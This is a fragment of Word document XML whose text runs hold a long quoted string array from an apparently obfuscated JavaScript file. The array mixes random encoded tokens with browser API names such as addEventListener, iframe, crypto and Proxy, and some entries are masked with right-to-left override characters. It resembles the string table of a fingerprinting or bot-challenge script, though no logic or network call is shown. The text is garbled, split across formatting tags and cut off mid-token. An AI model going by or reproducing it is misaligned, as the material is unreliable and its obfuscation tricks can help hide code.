OjzOOv8SdDDr33k74hbqfGy6GGY9LEHC0uvx8eeG3GY65Wbsrb5xzLVecFANRxD1lcPAshwGcWWo9B-t9zwXjJnOZexxrPzR3Z4tL0Yer6oPG7Ki-GKma-PlvMDUPUt8uw8W1e9aHMwIBkKLbmdf-y4Oi7YczmbdIKRJXr2DGDNEbSQuPkrphOyW5mR9DIVIJCBb8JTt6ny0btpkAa39uyTABQhxFnT6dQgtj3_kAfpPFNpo_H-lERljVtG_kOTCKmB6lROD_wtXgctUru_wEQYhNr8Tw43r_ifky3Sz882iU9y6TAPuuCVf1p56fM0nD-g9ntvv1QQb5w-bUBBQpxOtzBLGbA_a032QLRUaJepBtDD1KP89JYc_N17XFxTGjaD_NeF2uorXGY3CAVvzZb7yVNh3vrc_-ssT7pRfeOtwmzJhHGIrvo5GZ8KoKghefXn2uYJ99jxY68puAZgNQ16pyZhh4cR6a7ghuno6_cC33h7W9b35F__X5QVNum3AvxfdeDT3DoiUyXugJtz6MWlkIeZyAvC0PD5mbUuT50w4Nj3MIiCayK-mFJarsjYxvQVf6oqFsXKj2LdqUjYGYQTEvgcAzhfAhJ_muopeA7G4pn26jFqbAMV5coUy0Rz5f2t4uJcRBFsrlVIIpfv9kgSUYxgNeBrzU8aYXv56rHolCIwz0Kf0nZimohPsMp6CvjPLPq1z4C-kjbhepd40Bvq5wKyPddQAcfYnfXW2y7fXmnohTV90fa1N1vfcqlQ6euUs-OJ2d-Q8qb-vPQSdCRlJSPIg9Wf38dWzBenUOMm5rhhRGHs5RSMYoVxhq02IOaN6mnM_7lWxGMMjpZ7eRg-X4_LMOoOkLrqCbW9yGXdk7SSZ0BVR7BVfXKBclRQzVxtOkfvEjQnO1i9fvSxozWtvkFS054Yt</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>8k_7xvN0BZyvCy6_EP5d8wQN29wc2U6GRD_Wn-rVGIRqmhaegdWrHvWL2w2mDUK_LP4bcZpwezKU0R7-svCNHvDaroEgHSedqdhV2M7z3v33a4OmEKwoWvOHwB4XSsGB_W5Rejd02D9GGLEX6k36cKDV1BfVfG6ImHr0iGc3kbaC-VFIjMPVT3M5CtnyKQpCRje9v-mw1Oi1lxCR6ia29ivq1KwOsDfrbtyhKMZS4IGm1lb9P9uk5rZMBdfakwBsiWDiZoMGdJhtHg9R9WittEcMrn6Zd1HSyYhBCSwtVPT5Iqaaio5c_oVc0xMKmHydDAqsBMmhrgIe3rT5lJ3iUtJDsa-hDBHKkmNU_IDBHf8HutQc2MEbKJhHJyAqyruEHlX_tEx4ZsYgQ7DqW6Vt0EJh770gN32phS_XF3zGciqVfESdomxzJPQUyjcbkODRbOj3ujZrJgfb8BYwMyPS8r0rAs7REEKN_dyqhX8xzpQkHcSn-5ec8WMwYxnQ7RjPFcokahSMs", "86Nj5Ta3s1-X", "cn0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nrtt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-xo", "ZagTqByrx1Lylj8", "j9V_xjqBsEvXwhc", "reduce", "98hJjjKUkhiB_GAaQe4", "FvtZmCmEuEj4_SVKTPE", "kd19yQWE_ECOphEpbJv-TjS8", "A609-Q", "Math", "EcI", "No9grwyC-Hw", "QTqEWP5kLboKVKI", "CBebbM1vVqMWRp0", "Om6mD9N8Nqp3", "01S_F50", "LGXcZ7klEfdxcqfZhBZJ57R8RwZI8FnLEYehmklGnmeqqEETUERzfPhzzVanwJ-3R0uiWX8", "DGHjEqQEN8tMS8nn8zsgna8FO256m1qYMqeBvV9s2k_h9GVrKF9uLNMjtiSmlPfCJCGWQB2-YLrQBP7qGg", "s2DOKqJ2LNpSbLjb6Q", "7yaZQ-dKf64NOOOqjzcU9bw1Pxtp3TL1Jw", "b4kxuRzq4Q", "E7g54Veq", "X0m6B9lWcg", "8CbDWbwGDs0PML2m31oTg9l8ChMUmyv6Tg", "myiqL8NKeI8", "sqVK2VmRngo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LEPSOpMJIutz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "5eQD7FHy7S0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ryDNGaA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "abs", "LlapLcJHVJ4", "b5tYwCKY02yp", "-2\u202EYuuMIdcQn\u202D", "kTTwJIsjFM1BQN3SvV8x3ZEzW2VC9g", "children", "NcYMjG_z7Db-zzBMKNI", "function", "zpE_n1Lj-gbapRI", "O2jeQqpFF_gxLaU", "U8MfsWXI8iWXiAM-Q-XLSzE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>QFi-NdhjDg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "XtdalXyujU_S_WIeIK-LdRz68Y7vTeZ53w", "8CSDbPptaacjeaL2", "haIY4VnkwjqI5AQzBtKFEkfi", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GVyTGg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nodeName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "6TzFK6c6bfctcqq5yEkPrMlzVxBZ-zn_Xcbk2klXu2TNxVlLBgVSUb5J1xP5jM3qQ0r0WC2dBtq1KsHEeqIgHw", "match", "C6Ur43rm3x3Zzlc", "2cB87miNhgI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>toString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "E61hywjqlA","PGDNZ5kZB9x-cd7B3wM", "interactive", "y-5C10uBjhfKlnQ", "qbo51XzQ7g", "min", "-5gc1WfC13uprj5JDbmI", "SapNkz-f726EjWA4HuHZ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setPrototypeOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "any", "bst0jze6qXak", "detail", "sJxGyV-Jrln7xRZrTIk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TGc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ltltkQ-Hv0XJvUtSfw", "ga003CvjqGvbtxhCRfymCGk", "f_cbvHb23A", "PXKyBN04FpxiMM_k2xVm_Lo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XQbKHoYdVg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "34teyWz0zAncqDI-R4nPMQ", "-2HzdoQ3Rto", "18h2ggX1hQ", "l3Q", "pEv2LuA", "hidden", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "lc4PomaMvQLRkWl1YabaTQ2V", "Cc9MkDePkCDp-Hsa", "JmGAKOt8HahlOPXc", "51v1cdk4IqtFDcmJvjQ4gLxSfHVt6U6QG9A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lrw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Y0C4aJ1pDIVwTw", "9wL2cYgyBvghEJOP0W47qP9PKDA", "r-5wg2my_z6q8UkbGa30VDyjoY7DXqo", "CBf9e4QtYdpJVcq8_zEqkdpcM3hi4QjLVLqz90YC5kn48A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dTqqeMg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4mOqd-RPOKtLftSjjn4", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dispatchEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>addEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "RYx31QOB8Vmn2lZ8AeyeL0ut8LqObLl-xFMEB_X5PQ", "Go0q-wuE2g", "2F6XC-5FRK1xObi9mXVTvf0rJwoGhmavct-1wi1k-HzDzy4Pd1MaLsRU42HJ", "BNVs1Fs", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"Mwy8QvpJbbRxHA", "NuJm2w-rznLE2FgOBw", "nNt9yxSC9lLJjlQxL7HlSh_HsuzhTvIy93stYrG_E40", "8SKXD_IcSbFu", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attachEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x9UxxU_H2GfWxwcjdb3oWzyDz-7bRtQL", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XlI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "undefined", "13n0cKc6Rg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pXs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "catch", "substring", "zMNB_D-0m2z1", "SQHWQ9YcNtkvUYD20A", "sSWXbu91QvQ", "6jOVSIYxaLI0QoT41Q", "3BmUVo0", "DSzWeIIucOoqQtf66ngjt_hcZHc7", "wgS4aOITMI8", "6CDMVI4J", "mFDRVo87P69HdPflwA", "6xH3fpwrDO8tSd7p1TRY3bw", "round", "qjHRb7EhCuouLbmemG4I", "1mbfdvRKW95hVcvTgw", "n7cFjhHJ", "bwezb85xX88uNIQ", "aCWAEOE8PKVEZ50", "N12RKORyAJZ8a7w", "Yz_6d58EBuYUMs6H1T5J", "BgPYJ6Y6ZesuEA", "u3bSQL0jY-5bKPit", "A_pC8TPO4Q", "AoYVxSLsgGv5oSEtLtKedXnj-MydDuI8gBIeWNnfWO9tS7HY9q7dkz-Ye8lFHVdg7N8juPJN3Cdg", "Lqxf9AejoG-JszY9Hw", "bubbles", "itNNjzOd5Ejuvi5NB4evcziH88L1D8xi", "xIlL9jjTtXPn-nJD", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MrFDizWMug</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "set", "3gndOKZWXQ", "nK8S41H1wRrOthsMC-Y", "IDO0B9ljfYUUBqis", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mIBGnSifzGSilXcjSoPZdCOpkoI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8rIb", "string", "IccYhRvZ23XqiiA", "VBXsU7EKRN07BdTZkCQ", "bot1_wW-", "g1CpCKFQHfMZUOE", "mXD4XowgNdVMQ5T-hwh635dX", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tagName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "qwKQB_RHKZs6KLbRhA", "2mDqPIY3QclPFoT2kCwy04o", "0-hpvR6lt1k", "80-FQcY", "e36hKtR3e5dRC5-HpUggh91YHDgnsRifTuiD9V5exVv_vAk0QSAsE_Ro1FfoqOSHahGNYHE", "N6olrgr0lB-Ty0hjXvKwEV7XsLeLP5pdyn4", "dlj3dw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>documentMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "6WKucs1gKJY", "now", "dU72BJJ9ag", "xJse7EH3yUqN6CM8D9aO", "dzzFU9oze6Nq", "enumerable", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Odcu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "m4s_okyj-zbMzGhXZu2hFyWDg-XnYJR0", "xbUA033UyVk", "map", "^(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>--zn7c)?$|%", "Float64Array", "2Ngz8lLmwiz5gmI", "554", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ktg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "empty", "8d9TliOP62HwtCBTD4iSfS-Q29r8EdJ3x1kGMPSBT5JoD4T85_HNywvQLPEK", "kAvaOK1sXPk6", "Z4EEzXCVzQ", "4jj-K5c7dcMFGd6e", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Kphz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "6xiUDfhKSw", "4x7mf58AatwrQ8_G1WMBig", "bphlzxG3_W2z_xoTBuSrPG_v", "oUfPBKsXB6JqYfaUxXBH5ul8", "pDWJHKp6IaE", "UkuVIPh_BYVVNIKZ8x9s1qhTBkE", "B7Yo7Rnd9A7qnUIzBZi-HVqb3OrD", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HLw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "OVG0Lstxebp4R8rRqC1k9K4LfWRq_0mNNcjuqDQu4knh4Q4IFFxrMbRKowCj-tLS", "Proxy", "true", "Date", "6hioIA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GKRmxg_vmQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "bind", "type", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>indexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "J0jGLJIlC_hQDMHtzx1d150rJA", "oC2SEb1_dbYgLamw41gGoP58SFsZmXfvP5rC2A", "xnSyZOR6KKBSUZ2lkFk2gw", "cNNy9x650BDKkAw", "1Z0krxE", "LE7bbrIdH-ph", "sdBjmya8uQ","DGbCU7odffA3K_G41Xxe4fVYNB4_wBK-Mdf_-wdisF3ImnZGUytNGIo", "yT7BdJ1yftgQ", "YybrIosOaPsQIK_x7y0B7b87b39gyH6tZ8Gz_lhc5w", "zEf1N9cBMMBtbbTQ1nRQr41CNx01yyo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "l1SBJ-1qbKt4ft3u0Q", "Y07pRNkLHsY6Spw", "YrERg2Shwxfz_WM2HsE", "Int8Array", "wt9XkzSClCw", "eNNRzjWL_1jf21Y_W--8CVrV_IjjEJUe3Ho", "-zzifIY5L54CWdaCpDZjxtMcfhAurxWSGf7T1SJmnBzrv1dhQBV9fvtexzirz6TJaCrD", "6JFR7S6f5G26vHgUGPSVOw", "_xf-ZakBINkEJoGqw1sS", "GH-Oe8N9R5ViHA","CoJiqQjwzAo", "value", "ZVzfVL0cce5gKO31iBNf6bU_XRxVw2uqPYeQ00sPsDGAjjctY2UNHoxmqmWfx4D4CWOkS</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>EaGC9vmPIKLPIRg", "Va8i20HK8TaJ2BgtIuqxNmLC0a3vV5FJ7A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zWOBGIo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "hIJQjzqBz2ytv3k", "clf_Z5E6UYZBHYA", "0rYCgX3LvSag431lFcnEayep0Ys", "XSPlU_8KUaVVDu6S", "x6Y-9G0", "g4VFzS7PmDCn4A", "AVy4PeBqZKY","0I1PjSaKkk229ShlWJjnaCKxxPv7U_lU9xJgDK-gHdM", "BB74cYwWE-QjOsWJ0SA", "o7Ee", "top", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HRnkcPcsOA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "1GbiAJtBWqkfQA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>querySelector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "O5piuAO1oWeQ_AwoMOj9JlGShOKuPMI", "TG-yWN0oK6NgYKr21HZAyZgWLR8GoUCKUQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lastIndexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "svVtmT-2g2Hb2AlVP7niXBnWtoDSQep0pjctIebtJcoAVvCv5P_O1g", "stQj_ETJ0zE", "S0XubcI_KbduMNid", "apply", "XZRrsmqZ2kyknFEYeZi1VhGd3MvOPdIHxns", "moJV32Hi1h_J", "JfJe3w7StGWN", "bF_xWIwgLchcc-_h6hcnww", "21", "yh6SOPhZU60g", "QE2vJdtjbrdTBPzMqnI7hcAUNTp66EzVOQ", "nZs-uA3Tz0G12yhsXv_SaEE", "hqxh2wKdlVieyww", "vACTKq8", "^[\\x20-\\x7E]$", "C6lK6zutvGe7sDEjBOObO3y7zw", "OzPkPYcre9wUB4M", "3R3Fd60_Le0", "t9V3-Qo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FjamNPlIHbID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Ui-LBOVPP7oye-I", "bV2nVA", "olaVff54XeY", "KVmUOPB6IplpZbjZiw9K0710fBdI5Q", "BrMF_Ui-skftmTNxeuyAMSCB3feYIax4", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "2A7WWdEP", "Py_2Lp01", "7MpumjmO71bMw0N6eLCxCjndruPxF4IFoysRINW0QNI5Yuj_vIf5pgu6brorAmxOtbYAlMUo9zYI", "qS-MJbBTa7pTNQ", "uE0", "GRznZvUpDeIvC7bo", "U8Me7ieU1lqn_HU", "nkbHEa0xHt9Bc7OLsjcS8Q", "Symbol", "Xxu_bM1hQ6YvGcyQkQs_2JsIGDpJ", "error", "zf5C_Te2lXvvxA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "bRXfAek5TuIuIJLp5hpP8g", "sewV-3Hnx2P2qnpzForBfwyvnayLf-wt0lU", "24VrzXOK", "x_46pT7l6GDyvzgAIA", "message", "Vt5e3AOA7HrM6A", "gZA2jS7pzwo", "Mme7JfR6ONoDDt_isz4thYw", "input", "1z2XBqNiMg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PwvWGKc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8XKJIrsvYpNFbA", "-TqlNMp5", "L_VwsEGEtVb82B1iXc_kCwnfmLOHb5BBiTVJG97zGf8peoLw7pf5qSLsH9Y5FmgZ0PRUxeA5txtGlH0", "de0jv0Xz7jfTlAgFNNU", "3lS-BONRELEVKqs", "6vdKrCWtiBCCj35fWZXFWA", "b7wwozC59RGrs2BaHdWwZSXM", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getEntriesByType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "2rY", "lBDZK-paKKF7J6jXjF4a_rYhHUxI1C3_NYWs1A4_pWTPnHNIOA", "D5Q", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hOMAhxnR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "vudW9iKdnnHP5EhUVKk", "rvJR4iKdknDm-lhe", "HGqrYtxvCP4eZg", "4VeHQuBOObdOa_2snn9etvZwNz90hiSgadXip31y_ALfnXtLHxkPWJ5X91yPv9m-SQn2DlHtS7X0JdqUaNpxZ4IpQB-nvr13ndY", "Fx6vQONA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nodeType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>avlkzCCs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "PbgS80ewlGrbkwRXVOqvFw6n8MA", "OHO5JA", "UbEj5gXXkVffnBZSXeirBlnAzvynO9gKt21tZv__f5xcfcLqhZPhrkGlTf13Om1F2qwZhdV76BFB2AIo727X", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GhmxLog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "\u202EEWibjQBAF\u202D", "x1_gJ582", "Fvg__0_2hFijkh5UPIS9WxSIh6nuOo1S5ykpfLTbHd15Pdj4sKOx_jmSUcN9QSUK_bBN", "aCWVaOIgNsZHFpL-wCgGr6Yy", "ShP4Yb0pQg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pgGNeNZpSLovJbqp_EJb-dkH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "-eRflHi64DL9sC8SLg", "KXu7QcsKPOdrb4WuymVt2A", "8f1t9Qu-2UXT1kghfea9C0HL_LyuJYUO2XRFNKnnAN9qaoas04Grr3_DDdNwCH8SrKt0rqB59TEQiT9x5WnfxinvpdIeWRaBOSUwLI9G", "dV3nZMgAV95JDZ6MmyVx3Ikd", "Image", "xiurMd54FpcP", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getOwnPropertyNames</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Uf0mjK0zvhl3xSR5iEeiD0yJXXSqhwsxIDDvrBOuRDTPTiqdPFnRetJfYLWAlkgt0yh8kUkkA8uQZLsVGoqQKb67Q", "LN2", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gmrwMuMadoAPQME</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "tkPwPo4mKI9qddij8FZr", "rudG9TKdhEX770ZERZCZeheywJc", "Rpsi0UzerDaSzg4-", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mvsvnUXJnCjCxBdfbA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "crypto", "FATicPAwCfYbBb_Q8TZeoYo", "Option", "pow", "qvUenn7bgiPVpy0lFIf_cw", "WroEtnzz0z-jkA", "LNoRz3filR39yg", "iDLEVa0OBPJsVZiB", "object", "khDTIp8UQ_pON6I", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cPUBlHLU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "y1eWB45mQ8E", "EIs9_R_CyBylgUcv", "cpYe1nnA1nM", "JJ9Qiz-1mGyt", "eJlBrRq95267hEt2Qg","69NU1i6F7mKEuXIqQf_GZA", "Sl6wMt9b", "p1LgNIwmAt8bGZeJ6gNsjMRqBDhT5zDNWvqNlyRQj3er_wgkdA", "3YRFgDed-WSMsD4", "Q9VtuhG5syLu2EVTbdnuGw", "MzPwRIosHc94evzbrQIjqtI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jzOYWQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "self", "F3GvHfFFSf5pFKvi30MYuqBiM10", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RWegOsdw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "n8NlyxqivU7EzWZZaa6gUg", "7SmYbdQgMdVqA6Lu7D8jsLwKVw", "QKhP5DiglHKlpDY", "Function", "kp4", "7-UbqGLM", "UNDEFINED", "WlaXHf9RVqB7LenI3RV--7sqVAlA2nGZJI6b2mxGtg", "MdBAymj_vEL-yxoSRIjVIG6i_aXDW6di9DFxbK7ZNQ", "W5pnvSy5", "tGy-MZJcBZ13TJDE10Rpy9ZRGzMV6x7W", "pgCkUPNEV5kWG5WA-G950fkuJSoz0kXedNKa73YN01ay8Wt4PWN4eoU4", "Gb818UDl7lvlgwJrNpv5AhaAwOnE", "A0SzF85HEZpIGdHx5QM", "max", "M0XFbaQsEvdtIf3FziJR5pswVwtD9niwFovoxz9T83fD9kVeDHN2FOEBgly78o6bBginPSraWIn7LYeMJaglHawbdkPCn9gmy6TL6y-irXVJt09H-nUY7w", "sptnpBGuyVa0mgtN", "39YE2nDyjA", "Safari", "l_wCrXXw_inyul0XY4Q", "5o80kl3H9g", "awzFRdkbEI41XvDF4lQYrfg", "9eMd2UKhpg", "xrYynyaX11s", "method", "1G_YCrsCBdlTY_26xnpCqvdm", "s0LrZoQ-MpR2UdXw-1lqh5tZDSsN_RPZGaiXmQcihWP17ActfglBcqR4nk6riLuA", "U_c44GjWtyvJ5HQLNvjWL2Ditw", "mmjjJ88D", "A-YwvgTO1VfUlR8ABqb3Tx2J5ca5I4hSz2E8RaazEJEpbYa2hc6roS6LQA", "7gDWErA", "yUzBcMZgUZBaQN2q5A", "4Tm4CsRXdJo", "9vZGkkSXjVLK7A", "bg2YX-IQYtR5WcCcjg", "E6x89AWoySk", "wVfvOJ8oPL1jT8HG7lx7jg", "jBX7LZ8", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eyWpS_U</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-JA", "LRL1WoYUTLN-KKCntw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>byteLength</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gRezIthr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Xbwz3UDU50eZ1B0hNvCuA2XE5_6rEo1O9XIXOY-qEMcmFbCqsMOHpBX0YrhDQnxk4_ZTjdc_u21L33I8xkjQ7lXtj7Y2", "5UaZQPRQbJY", "OzenP8F0E48JCpDrty5q1I0DPV4i_E_DCaaO_1srlQ", "ywKZetd3V7g7AK6g-Q", "P0vSPq84BfY", "J6Uo6EM", "seUw8TTKsi7xxgtM", "9waqGL0dYsJJO4OK", "EalE9xm4xG6dyGVZNMihCWmSyYI", "rfoqnFTA1QLClkwGboTvXQvatPHgVMNIqWgGQNmhaNAEDfX18s6HsFiqcaA", "Element", "V5lDty3u6XKgq1k0BbSOGQ", "llvbYfReRMNkHZmVt2wVj9k7Hg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FgDFVw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Mt1OnnK0ymf7", "LLwD92GZjWfKnDY", "jI4t8Hfj0Ec", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>YwvYWbsGOw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
